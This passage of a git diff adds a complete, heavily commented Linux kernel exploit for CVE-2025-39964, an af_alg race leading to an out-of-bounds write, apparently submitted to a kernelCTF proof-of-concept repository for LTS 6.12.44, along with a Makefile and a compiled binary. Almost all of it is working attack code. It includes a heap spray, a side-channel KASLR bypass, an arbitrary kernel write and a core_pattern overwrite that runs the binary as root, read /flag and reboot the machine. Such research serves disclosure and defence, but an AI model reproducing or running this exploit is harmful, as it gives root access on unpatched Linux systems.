{.rlim_cur = 0xf000, .rlim_max = 0xf000}; + setrlimit(RLIMIT_NOFILE, &rlim); + + if (argc > 1) { +#define SYS_pidfd_getfd 438 + int pid = strtoull(argv[1], 0, 10); + int pfd = syscall(SYS_pidfd_open, pid, 0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd, 0); + dup2(stdoutfd, 1); + dup2(stderrfd, 2); + /* Run cat /flag multiple times to ensure output is flushed before reboot */ + for (int i = 0; i < 6; i++) + system("cat /flag"); + + system("cat /flag;echo o>/proc/sysrq-trigger"); + execlp("bash", "bash", NULL); + } + /* Step 7: fork a watcher that polls core_pattern and triggers crash once + * overwritten */ + if (fork() == 0) { + set_cpu(0); + setsid(); + crash(""); + } + /* Retry loop: trigger_exploit() may fail the race; restart on failure */ + while (1) { + if (fork() == 0) { + trigger_exploit(); + exit(0); + } + wait(NULL); + } +} + +int trigger_exploit() { + int tfmfd; + + set_cpu(1); + SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, cfd)); + + /* Step 1: spray heap with crafted msg_control buffers */ + spray_unix_sockets(); + + char *addr = SYSCHK(mmap(0, MMAP_REGION_LEN, PROT_READ | PROT_WRITE, + MAP_PRIVATE | MAP_ANON, -1, 0)); + struct iovec local = {.iov_base = addr, .iov_len = MMAP_REGION_LEN}; + struct iovec remote = {.iov_base = addr, .iov_len = MMAP_REGION_LEN}; + + struct sockaddr_alg sa = { + .salg_family = AF_ALG, + .salg_type = "skcipher", /* symmetric key cipher */ + .salg_name = "cbc(aes)", /* AES in CBC mode */ + }; + + /* Step 2: create and bind the AF_ALG transformation socket */ + tfmfd = socket(AF_ALG, SOCK_SEQPACKET, 0); + if (tfmfd == -1) { + perror("socket"); + return 1; + } + + if (bind(tfmfd, (struct sockaddr *)&sa, sizeof(sa)) != 0) { + perror("bind"); + close(tfmfd); + return 1; + } + + unsigned char key[32] = {0}; + if (setsockopt(tfmfd, SOL_ALG, ALG_SET_KEY, key, sizeof(key)) != 0) { + perror("setsockopt"); + close(tfmfd); + return 1; + } + + opfd = accept(tfmfd, NULL, 0); + if (opfd == -1) { + perror("accept"); + close(tfmfd); + return 1; + } + + int val = 0x1000; + + struct { + struct cmsghdr cmsg; + __u32 op; + __u32 ivlen; + unsigned char iv[16]; + } __attribute__((__packed__)) msg; + + memset(&msg, 0, sizeof(msg)); + msg.cmsg.cmsg_level = SOL_ALG; + msg.cmsg.cmsg_type = ALG_SET_OP; + msg.cmsg.cmsg_len = CMSG_LEN(sizeof(__u32) + sizeof(__u32) + 16); + + msg.op = ALG_OP_ENCRYPT; + msg.ivlen = 16; + memset(msg.iv, 0x01, 16); + + struct iovec iov = { + .iov_base = buf, + .iov_len = 0x1000, + }; + + struct msghdr msgh; + memset(&msgh, 0, sizeof(msgh)); + msgh.msg_iov = &iov; + msgh.msg_iovlen = 1; + msgh.msg_control = &msg; + msgh.msg_controllen = msg.cmsg.cmsg_len; + + /* Step 3: initial sendmsg to initialise the tsgl; advances sgl->cur to 1 */ + ssize_t n = sendmsg(opfd, &msgh, MSG_MORE); + printf("init %ld\n", n); + + /* + * Step 3 (cont): advance sgl->cur from 1 to 124 (MAX_SGL_ENTS - 2) using + * SGL_MERGE_ITERATIONS = 0x7b send+recv pairs. Each send allocates one sg + * entry (cur++); each recv drains the processed entry so the socket stays + * writable. The loop comment in the original PR is: + * "the loop with 0x7b + the sendmsg and send calls executes 125 times, + * matching MAX_SGL_ENTS - 1 = 126 - 1 = 125." + */ + for (int i = 0; i < SGL_MERGE_ITERATIONS; i++) { + SYSCHK(send(opfd, buf, 0x1000, MSG_MORE)); + n = recv(opfd, buf, 0x1000, 0); + } + + /* Advance sgl->cur to 125 = MAX_SGL_ENTS - 1 (one slot before the list is + * full) */ + send(opfd, buf, 0x1000, MSG_MORE); + SYSCHK(setsockopt(opfd, SOL_SOCKET, SO_SNDBUF, &val, sizeof(val))); + printf("setsockopt done\n"); + + /* + * Step 3 (race): fork two children that race each other: + * + * Child A (send invalid addr): passes INVALID_USER_ADDR, which causes + * af_alg_alloc_tsgl() to allocate a new tsgl (sgl->cur → 0) then fail + * in memcpy_from_msg() — leaving ctx->merge = 1 and sgl->cur = 0. + * + * Child B (send 0x200 bytes): sends a sub-page-size buffer so that + * ctx->merge is set to 1 and sgl->cur advances to MAX_SGL_ENTS = 126. + * + * Desired outcome: both children finish such that ctx->merge == 1 AND the + * last tsgl has sgl->cur == 0. The next send() will then use sg[-1]. + */ + if (fork() == 0) { + /* Child A: trigger new-tsgl allocation then fail — sets sgl->cur = 0 */ + int x = send(opfd, INVALID_USER_ADDR, 0x400, MSG_MORE); + printf("send3 %d\n", x); + exit(0); + } + + if (fork() == 0) { + /* Child B: sub-page send sets ctx->merge = 1 and fills sgl->cur to + * MAX_SGL_ENTS */ + int x = send(opfd, buf, 0x200, MSG_MORE); + printf("send2 %d\n", x); + exit(0); + } + + /* + * @sleep(desc="wait for both fork children to reach their send() calls and + * set ctx->merge=1 with sgl->cur=0 before we recv()") + */ + sleep(1); + n = recv(opfd, buf, 0x1000, 0); + printf("recv2 %ld\n", n); + wait(NULL); + + /* Step 4: release spray threads so they re-send their crafted payloads */ + for (int i = 0; i < THREAD_NUM; i++) { + write(cfd[1], buf, 1); + } + + n = recv(opfd, buf, 0x1000, 0); + printf("recv2 %ld\n", n); + + memset(buf, 'z', 0x1000); + wait(NULL); + + /* Step 5: map userspace oracle region for the binary search */ + allocate_map(); + + /* Step 5 (OOB trigger): with ctx->merge=1 and sgl->cur=0 this send uses + * sg[-1].page_link from our sprayed payload — triggering the OOB write. + * Returns -1 if the write destination is unmapped (race failed); 1 if mapped. + */ + int x = send(opfd, buf, 1, MSG_MORE); + + if (x == 1) { + puts("Race fail"); + exit(0); + } + + /* + * Step 5 (binary search oracle): + * + * Background: + * sg[-1].page_link is effectively a pointer to a struct page in vmemmap. + * The kernel computes the write destination as: + * dest = page_address(sg_page(sg)) + sg->offset + sg->length + * = page_offset_base + (page_link - vmemmap_base) / 64 * PAGE_SIZE + * + offset + length + * With page_link ≈ 0, the pfn arithmetic wraps to a very large value, and + * (page_offset_base + pfn * PAGE_SIZE) wraps further to land within our + * userspace oracle region [SCAN_START_ADDR, SCAN_END_ADDR). + * + * Oracle: + * send() returns 1 → the write destination is in a mapped page (success). + * send() returns -1 → the destination is unmapped (copy_from_user failed). + * By progressively munmap-ing halves of the oracle region we can determine + * which physical page corresponds to the OOB write target. + * + * Binary search (8 iterations → narrows range from SCAN_END_ADDR to ~340 MB): + * Each iteration j tests: "if I decrease page_link by half_range/64, does + * the write still succeed?" + * - Decreasing page_link by Δ shifts dest by Δ*64 bytes (since each + * struct-page unit = 64 bytes = one PAGE_SIZE/64 step in physmap). + * - The test delta (SCAN_END_ADDR >> (7+j)) in page_link units equals + * half_range = (SCAN_END_ADDR >> (1+j)) in dest-address units. + * If the shifted oracle still succeeds → dest is in the *upper* half → + * unmap the lower half and advance start. + * Otherwise → dest is in the *lower* half → unmap the upper half. + */ + size_t oracle; + size_t leak_offset = 0; + int xcnt = 0; + for (int k = 0; k < MAX_SCAN_ITERATIONS; k++) { + for (int i = 0; i < THREAD_NUM; i++) { + read(sfd[i][0], buf, 0x1000); + read(cfd[1], buf, 1); + } + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] -= (SCAN_END_ADDR >> 6); + write(cfd[1], buf, 0x100); + buf[0] = 'a'; + x = send(opfd, buf, 1, MSG_MORE); + if (x == 1) { + puts(""); + xcnt++; + oracle = *(size_t *)&payload[PAYLOAD_OFFS_TARGET]; + char *start = (void *)(0ULL); + for (int j = 0; j < 8; j++) { + printf("loop j: %d\n", j); + x = guess_addr(oracle - (SCAN_END_ADDR >> (7 + j))); + if (x == 1) { + xcnt++; + start += (SCAN_END_ADDR >> (1 + j)); /* upper half */ + munmap(start - (SCAN_END_ADDR >> (1 + j)), + (SCAN_END_ADDR >> (1 + j))); + } else { + munmap(start + (SCAN_END_ADDR >> (1 + j)), + (SCAN_END_ADDR >> (1 + j))); + } + } + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = oracle; + /* search_offset returns the exact userspace VA of the OOB-written page */ + leak_offset = search_offset(start) + xcnt; + printf("leak_offset %zx\n", leak_offset); + printf("%zx\n", *(size_t *)&payload[PAYLOAD_OFFS_TARGET]); + + break; + } + } + + if (leak_offset == 0) + exit(0); + + for (int i = 0; i < THREAD_NUM; i++) { + read(sfd[i][0], buf, 0x1000); + read(cfd[1], buf, 1); + } + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = oracle; + write(cfd[1], buf, 0x100); + + /* + * Step 6: redirect the OOB write to core_pattern. + * + * leak_offset is the VA of the currently-targeted physical page. + * core_pattern is the KASLR-adjusted kernel VA of core_pattern[]. + * + * First, align within-page: send adjust_offset bytes so that after the + * advance the write starts at the same within-page offset as core_pattern. + */ + size_t adjust_offset = + PAGE_SIZE + (core_pattern & PAGE_MASK) - (leak_offset & PAGE_MASK); + leak_offset += adjust_offset; + + memset(buf, 'z', 0x1000); + SYSCHK(send(opfd, buf, adjust_offset - 1, MSG_MORE)); + SYSCHK(send(opfd, buf, 1, MSG_MORE)); + + printf("sg->len overflow check %x\n", *(char *)(leak_offset - 1)); + if (*(char *)(leak_offset - 1) != 'z') + leak_offset -= 0x100000000ULL; + + for (int i = 0; i < THREAD_NUM; i++) { + read(sfd[i][0], buf, 0x1000); + read(cfd[1], buf, 1); + } + + /* + * Now adjust payload[PAYLOAD_OFFS_TARGET] (= sg[-1].page_link) so that + * page_address(sg_page(sg)) points to the physical page holding core_pattern. + * The >> 6 (or / 64) is actually a simplification of the formula + * (addr / 0x1000) * 64. We divide the address by 0x1000 to find the page + * index, and then multiply by 64 because each memory page has a page_struct + * that is exactly 64 bytes long. + * payload[PAYLOAD_OFFS_TARGET] is sg[-1].page_link, which controls dest via + * the formula described in the binary search comment above. + */ + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] += + (((core_pattern & ~PAGE_MASK) - (leak_offset & ~PAGE_MASK)) >> 6); + printf("%zx\n", *(size_t *)&payload[PAYLOAD_OFFS_TARGET]); + write(cfd[1], buf, 0x100); + /* Step 6 (write): send the core_pattern string; kernel copies it to + * core_pattern[] */ + char mcore[64] = "|/proc/%P/fd/666 %P"; + SYSCHK(send(opfd, mcore, 64, MSG_MORE)); + PAUSE; + + return 0; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_begin() { + uint64_t a, d; + asm volatile("mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "lfence\n\t" + : "=r"(d), "=r"(a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d << 32) | a; + return a; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_end() { + uint64_t a, d; + asm volatile("xor %%rax, %%rax\n\t" + "lfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r"(d), "=r"(a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d << 32) | a; + return a; +} + +void prefetch(void *p) { + asm volatile("prefetchnta (%0)\n" + "prefetcht2 (%0)\n" + : + : "r"(p)); +} + +size_t flushandreload(void *addr) /* row miss */ +{ + size_t time = rdtsc_begin(); + prefetch(addr); + size_t delta = rdtsc_end() - time; + return delta; +} + +/* + * KASLR bypass via Flush+Reload side channel. + * + * Uncomment KASLR_BYPASS_INTEL for Intel CPUs (kernelCTF remote instances). + * Keep commented for GitHub CI (AMD/other) to use the sliding-window variant. + * Alternatively pass -DKASLR_BYPASS_INTEL to the compiler without touching + * source. + */ +// #define KASLR_BYPASS_INTEL +size_t bypass_kaslr(u64 base) { + if (!base) { +#ifdef KASLR_BYPASS_INTEL +#define OFFSET 0 +#define START (0xffffffff81000000ull + OFFSET) +#define END (0xffffffffD0000000ull + OFFSET) +#define STEP 0x0000000001000000ull + while (1) { + u64 bases[7] = {0}; + for (int vote = 0; vote < ARRAY_LEN(bases); vote++) { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + addrs[ti] = START + STEP * (u64)ti; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + u64 addr = addrs[ti]; + size_t t = flushandreload((void *)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + size_t minv = ~0; + size_t mini = -1; + for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) { + if (times[ti] < minv) { + mini = ti; + minv = times[ti]; + } + } + + if (mini < 0) { + return -1; + } + + bases[vote] = addrs[mini]; + } + + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (c == 0) { + base = bases[i]; + } else if (base == bases[i]) { + c++; + } else { + c--; + } + } + + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (base == bases[i]) { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) { + base -= OFFSET; + goto got_base; + } + + printf("majority vote failed:\n"); + printf("base = %llx with %d votes\n", base, c); + } +#else +#define START (0xffffffff81000000ull) +#define END (0xffffffffc0000000ull) +#define STEP 0x0000000000200000ull +#define NUM_TRIALS 9 +/* largest contiguous mapped area at the beginning of _stext */ +#define WINDOW_SIZE 11 + + while (1) { + u64 bases[NUM_TRIALS] = {0}; + + for (int vote = 0; vote < ARRAY_LEN(bases); vote++) { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + addrs[ti] = START + STEP * (u64)ti; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + u64 addr = addrs[ti]; + size_t t = flushandreload((void *)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + uint64_t max = 0; + int max_i = 0; + for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) { + uint64_t sum = 0; + for (int i = 0; i < WINDOW_SIZE; i++) { + sum += times[ti + i]; + } + if (sum > max) { + max = sum; + max_i = ti; + } + } + + bases[vote] = addrs[max_i]; + } + + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (c == 0) { + base = bases[i]; + } else if (base == bases[i]) { + c++; + } else { + c--; + } + } + + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (base == bases[i]) { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) { + goto got_base; + } + + printf("majority vote failed:\n"); + printf("base = %llx with %d votes\n", base, c); + } +#endif + } + +got_base: + + printf("using kernel base %llx\n", base); + + return base; +} diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/Makefile b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/Makefile new file mode 100644 index 000000000..3eabaca61 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/Makefile @@ -0,0 +1,5 @@ +all: exploit + +exploit: exploit.c + gcc -static-pie -o exploit exploit.c + diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/exploit b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/exploit new file mode 100755 index 000000000..16c519ca2 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/exploit.c b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/exploit.c new file mode 100644 index 000000000..837b3b79a --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/exploit.c @@ -0,0 +1,899 @@ +/* + * Exploit for CVE-2025-39964 — Linux af_alg out-of-bounds write (LTS 6.12.44) + * + * Vulnerability: af_alg_sendmsg() has a race condition allowing two concurrent + * sendmsg calls to produce ctx->merge=1 with sgl->cur=0 simultaneously. + * In this state the merge branch computes sg = sgl->sg + sgl->cur - 1 = sg[-1], + * which is an out-of-bounds read into the previous heap chunk. The + * sg[-1].page_link value from the previous chunk controls the destination of + * memcpy_from_msg(), giving an arbitrary kernel write primitive. + * + * Exploit chain (LTS 6.12.44): + * 1. Spray 0x100 AF_UNIX socket pairs; each thread sends a crafted msghdr + * whose msg_control (payload[]) lands in the heap slot just before an + * af_alg_tsgl. payload[PAYLOAD_OFFS_TARGET] controls sg[-1].page_link = write + * destination. + * 2. Set up an AF_ALG socket (AES-CBC); advance sgl->cur to MAX_SGL_ENTS-1 = + * 125 using 1 sendmsg + SGL_MERGE_ITERATIONS send/recv pairs + 1 more send. + * 3. Fork two children that race: one sets ctx->merge=1 + * (sgl->cur→MAX_SGL_ENTS), the other allocates a new sgl (sgl->cur→0) via an + * invalid userspace pointer. + * 4. With ctx->merge=1 and sgl->cur=0, the next sendmsg triggers the OOB write + * to the address derived from payload[PAYLOAD_OFFS_TARGET]. + * 5. Map [SCAN_START_ADDR, SCAN_END_ADDR) in MAP_CHUNK_SIZE (2 GB) chunks so + * the OOB write destination (which wraps into userspace due to page_link + * arithmetic) falls in a mapped region. An 8-step binary search (oracle = + * send() return value) narrows the target to a ~340 MB window; mincore then + * locates the exact page. + * 6. Adjust the write destination via page_link arithmetic to point to the + * core_pattern kernel symbol, then write "|/proc/%P/fd/666 %P". + * 7. A forked child watches for core_pattern to change, then faults (NULL + * deref), causing the kernel to execute our binary as root via core_pattern. + * 8. Re-exec reads /flag via pidfd_getfd() on the parent's stdio descriptors. + */ + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#ifndef SYS_pidfd_getfd +#define SYS_pidfd_getfd 438 +#endif + +#ifndef SYS_pidfd_open +#define SYS_pidfd_open 434 +#endif + +size_t vmemmap_base = 0xffffea0000000000ULL; +size_t page_offset_base = 0xffff888000000000ULL; +size_t core_pattern = 0xffffffff8420d520ULL; + +/* Socket options */ +#define ALG_SET_KEY 1 +#define ALG_SET_IV 2 +#define ALG_SET_OP 3 +#define ALG_SET_AEAD_ASSOCLEN 4 +#define ALG_SET_AEAD_AUTHSIZE 5 +#define ALG_SET_DRBG_ENTROPY 6 +#define ALG_SET_KEY_BY_KEY_SERIAL 7 + +/* Operations */ +#define ALG_OP_DECRYPT 0 +#define ALG_OP_ENCRYPT 1 + +typedef unsigned char u8; +typedef unsigned short u16; +typedef unsigned int u32; +typedef unsigned long long u64; +typedef char i8; +typedef short i16; +typedef int i32; +typedef long long i64; +#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0])) + +#define __u32 uint32_t +#define __u16 uint16_t +#define __u8 uint8_t +#define PAUSE \ + { \ + int x; \ + printf(":"); \ + read(0, &x, 1); \ + } + +#define SYSCHK(x) \ + ({ \ + typeof(x) __res = (x); \ + if (__res == (typeof(x))-1) \ + err(1, "SYSCHK(" #x ")"); \ + __res; \ + }) + +#ifndef SYS_process_vm_readv +#define SYS_process_vm_readv 310 +#endif + +/* Number of AF_UNIX pairs to spray; one pair per exploit thread */ +#define THREAD_NUM 0x100 + +/* + * Size of each private anonymous mapping used as the OOB write oracle region: + * 512 PTEs per page * PAGE_SIZE = 2 MB physical coverage per mmap entry. + */ +#define MMAP_REGION_LEN (0x1000 / 8 * 0x1000) + +/* + * Start of the contiguous userspace region we map for the binary-search oracle. + * We start just above the 4 GB boundary to avoid the low userspace region. + */ +#define SCAN_START_ADDR 0x100000000ULL + +/* Maximum number of mincore windows tried during the page-address scan */ +#define MAX_SCAN_ITERATIONS 0x50 + +/* + * Unmapped address passed as invalid user pointer to trigger the race + * condition: the first 4 MB of virtual address space (0–0xfff000) is always + * unmapped. + */ +#define INVALID_USER_ADDR ((void *)0xfff000) + +/* + * Byte offset of sg[-1].page_link inside the sprayed msg_control payload: + * af_alg_tsgl is allocated in a 4096-byte slab object. + * sgl->sg[0] starts at byte 24 (sizeof(af_alg_tsgl)). + * sg[-1] = sgl->sg[-1] lies 32 bytes (sizeof(scatterlist)) before sg[0], + * i.e. at byte 24 - 32 = -8 relative to the tsgl object start. + * In the *previous* 4096-byte heap object that is offset 4096 - 8 = 0xff8. + * scatterlist.page_link is the first field (offset 0), so payload[0xff8] + * directly controls the page_link that the OOB write uses as its destination. + */ +#define PAYLOAD_OFFS_TARGET 0xff8 + +/* + * Number of send/recv iterations to advance sgl->cur from 1 to 124 + * (MAX_SGL_ENTS-2). MAX_SGL_ENTS = (4096 - sizeof(af_alg_tsgl)) / + * sizeof(scatterlist) - 1 = (4096 - 24) / 32 - 1 = 126. One initial sendmsg + * sets cur=1; SGL_MERGE_ITERATIONS send+recv pairs bring it to 1 + 0x7b = 124; + * one more send brings it to 125 = MAX_SGL_ENTS - 1. + */ +#define SGL_MERGE_ITERATIONS 0x7b + +/* Compile-time unslid base of kernel text (_stext); used when computing symbol + * offsets */ +#define KERNEL_TEXT_BASE 0xffffffff81000000UL + +/* + * KASLR-invariant offset of core_pattern from _stext in LTS 6.12.44. + * core_pattern is at 0xffffffff8420e260; _stext is at KERNEL_TEXT_BASE. + */ +#define CORE_PATTERN_LTS_OFFSET (0xffffffff8420e260UL - KERNEL_TEXT_BASE) + +/* Upper bound of the userspace oracle scan region [SCAN_START_ADDR, + * SCAN_END_ADDR) */ +#define SCAN_END_ADDR 0x500000000000ULL + +/* Size of each anonymous 2 GB mmap chunk used to cover the oracle region */ +#define MAP_CHUNK_SIZE 0x80000000ULL + +#ifndef PAGE_SIZE +#define PAGE_SIZE 0x1000 +#endif +/* Page offset mask for within-page alignment (PAGE_SIZE - 1) */ +#define PAGE_MASK (PAGE_SIZE - 1) + +pthread_t tid[THREAD_NUM]; + +/* Shared scratch buffer used by spray threads and the main exploit loop */ +char buf[0x10000]; +char vec[0x100000]; + +int cfd[2]; +int sfd[THREAD_NUM][2]; +char payload[0x1000]; +int opfd; + +struct sockaddr_alg { + __u16 salg_family; + __u8 salg_type[14]; + __u32 salg_feat; + __u32 salg_mask; + __u8 salg_name[64]; +}; + +void set_cpu(int i) { + cpu_set_t mask; + CPU_ZERO(&mask); + CPU_SET(i, &mask); + sched_setaffinity(0, sizeof(mask), &mask); +} + +void *spray_send_thread(void *x) { + size_t idx = (size_t)x; + write(cfd[0], buf, 1); + read(cfd[0], buf, 1); + struct iovec iov = {buf, 0x1000}; + struct msghdr mhdr = {.msg_iov = &iov, + .msg_iovlen = 1, + .msg_control = payload, + .msg_controllen = 0x1000}; + while (1) { + sendmsg(sfd[idx][1], &mhdr, 0); + write(cfd[0], buf, 1); + read(cfd[0], buf, 1); + } +} + +/* + * Step 1: Spray THREAD_NUM AF_UNIX socket pairs, each sending a crafted msghdr + * whose msg_control buffer (payload[]) will occupy the heap slot immediately + * preceding an af_alg_tsgl allocation. payload[PAYLOAD_OFFS_TARGET] then + * aliases sg[-1].page_link and controls the OOB write destination. + */ +void spray_unix_sockets() { + memset(payload, 'a', 0x1000); + struct cmsghdr *first; + first = (struct cmsghdr *)payload; + first->cmsg_len = 0x1000; + first->cmsg_level = + 0; /* must differ from SOL_SOCKET=1 to skip cmsg processing */ + first->cmsg_type = 0x41414141; /* dummy filler value */ + /* Initially zero; the binary search will update this to guide the OOB write + */ + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = 0; + + for (int i = 0; i < THREAD_NUM; i++) { + SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, sfd[i])); + int n = 0x800; + setsockopt(sfd[i][1], SOL_SOCKET, SO_SNDBUF, (char *)&n, sizeof(n)); + setsockopt(sfd[i][0], SOL_SOCKET, SO_RCVBUF, (char *)&n, sizeof(n)); + write(sfd[i][1], buf, 0x1000); + } + + for (int i = 0; i < THREAD_NUM; i++) + pthread_create(&tid[i], 0, spray_send_thread, (void *)(size_t)i); + + for (int i = 0; i < THREAD_NUM; i++) + read(cfd[1], buf, 1); +} + +/* + * Step 5a: Map the full userspace range [SCAN_START_ADDR, SCAN_END_ADDR) with + * physical pages in MAP_CHUNK_SIZE (2 GB) chunks. When sg[-1].page_link is + * crafted with a value near 0, the kernel's page_address() computation wraps + * around and the OOB write destination lands somewhere within this region. + * Mapping real pages here means the write silently succeeds (our oracle), + * letting us binary-search for the exact physical page by progressively + * munmap-ing halves of this range. + */ +void allocate_map() { + char *start = (void *)SCAN_START_ADDR; + while (1) { + start = SYSCHK(mmap(start, MAP_CHUNK_SIZE, PROT_READ | PROT_WRITE, + MAP_SHARED | MAP_ANON | MAP_FIXED, -1, 0)); + start += MAP_CHUNK_SIZE; + if ((size_t)start >= SCAN_END_ADDR) + break; + } +} + +/* + * Step 5b: Use mincore to find the exact virtual address in [start, start+4GB) + * that corresponds to the physical page the OOB write targets. A page marked + * resident (mincore bit = 1) that also contains our spray marker ('a') is the + * hit: it is the page that the kernel's arbitrary-write wrote into. + */ +size_t search_offset(char *start) { + char *pvec = NULL; + for (int i = 0; i < MAX_SCAN_ITERATIONS; i++) { + mincore((void *)start, 0x100000000ULL, vec); + pvec = memchr(vec, 1, 0x100000); + if (pvec) { + char *leak_offset = start + (pvec - vec) * 0x1000; + pvec = memchr((void *)leak_offset, 'a', 0x1000); + if (pvec) + break; + } + start += 0x100000000ULL; + } + if (pvec == NULL) + exit(0); + printf("\npvec %p %x\n", pvec, pvec[0]); + return (size_t)pvec; +} + +int check_core() { + /* Check if /proc/sys/kernel/core_pattern has been overwritten */ + char core_pattern_buf[0x100] = {}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + read(core, core_pattern_buf, sizeof(core_pattern_buf)); + close(core); + return strncmp(core_pattern_buf, "|/proc/%P/fd/666", 0x10) == 0; +} + +void crash(char *cmd) { + int memfd = memfd_create("", 0); + /* send our binary to memfd for core_pattern payload */ + SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff)); + /* our binary now at file descriptor 666 */ + dup2(memfd, 666); + close(memfd); + while (check_core() == 0) + sleep(1); + puts("Root shell !!"); + /* Trigger program crash and cause kernel to execute program from core_pattern + * which is our "root" binary */ + *(size_t *)0 = 0; +} + +size_t bypass_kaslr(u64 base); + +int guess_addr(size_t guesss) { + for (int i = 0; i < THREAD_NUM; i++) { + read(sfd[i][0], buf, 0x1000); + read(cfd[1], buf, 1); + } + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = guesss; + write(cfd[1], buf, 0x100); + buf[0] = 'b'; + int x = send(opfd, buf, 1, MSG_MORE); + printf("x: %d\n", x); + return x == 1; +} + +int trigger_exploit(); +int main(int argc, char **argv) { + + setvbuf(stdin, 0, 2, 0); + setvbuf(stdout, 0, 2, 0); + puts("Exploit start"); + if (argc == 1) { + size_t stext = 0; + if (getenv("KTEXT")) + stext = strtoull(getenv("KTEXT"), 0, 16); + else + stext = bypass_kaslr(0); + /* core_pattern symbol is at a fixed offset from _stext; set MIT=1 for + * mitigation target */ + core_pattern = stext + CORE_PATTERN_LTS_OFFSET; + printf("got stext 0x%zx 0x%zx\n", stext, core_pattern); + } + + struct rlimit rlim = {.rlim_cur = 0xf000, .rlim_max = 0xf000}; + setrlimit(RLIMIT_NOFILE, &rlim); + + if (argc > 1) { +#define SYS_pidfd_getfd 438 + int pid = strtoull(argv[1], 0, 10); + int pfd = syscall(SYS_pidfd_open, pid, 0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd, 0); + dup2(stdoutfd, 1); + dup2(stderrfd, 2); + /* Run cat /flag multiple times to ensure output is flushed before reboot */ + for (int i = 0; i < 6; i++) + system("cat /flag"); + + system("cat /flag;echo o>/proc/sysrq-trigger"); + execlp("bash", "bash", NULL); + } + /* Step 7: fork a watcher that polls core_pattern and triggers crash once + * overwritten */ + if (fork() == 0) { + set_cpu(0); + setsid(); + crash(""); + } + /* Retry loop: trigger_exploit() may fail the race; restart on failure */ + while (1) { + if (fork() == 0) { + trigger_exploit(); + exit(0); + } + wait(NULL); + } +} + +int trigger_exploit() { + int tfmfd; + + set_cpu(1); + SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, cfd)); + + /* Step 1: spray heap with crafted msg_control buffers */ + spray_unix_sockets(); + + char *addr = SYSCHK(mmap(0, MMAP_REGION_LEN, PROT_READ | PROT_WRITE, + MAP_PRIVATE | MAP_ANON, -1, 0)); + struct iovec local = {.iov_base = addr, .iov_len = MMAP_REGION_LEN}; + struct iovec remote = {.iov_base = addr, .iov_len = MMAP_REGION_LEN}; + + struct sockaddr_alg sa = { + .salg_family = AF_ALG, + .salg_type = "skcipher", /* symmetric key cipher */ + .salg_name = "cbc(aes)", /* AES in CBC mode */ + }; + + /* Step 2: create and bind the AF_ALG transformation socket */ + tfmfd = socket(AF_ALG, SOCK_SEQPACKET, 0); + if (tfmfd == -1) { + perror("socket"); + return 1; + } + + if (bind(tfmfd, (struct sockaddr *)&sa, sizeof(sa)) != 0) { + perror("bind"); + close(tfmfd); + return 1; + } + + unsigned char key[32] = {0}; + if (setsockopt(tfmfd, SOL_ALG, ALG_SET_KEY, key, sizeof(key)) != 0) { + perror("setsockopt"); + 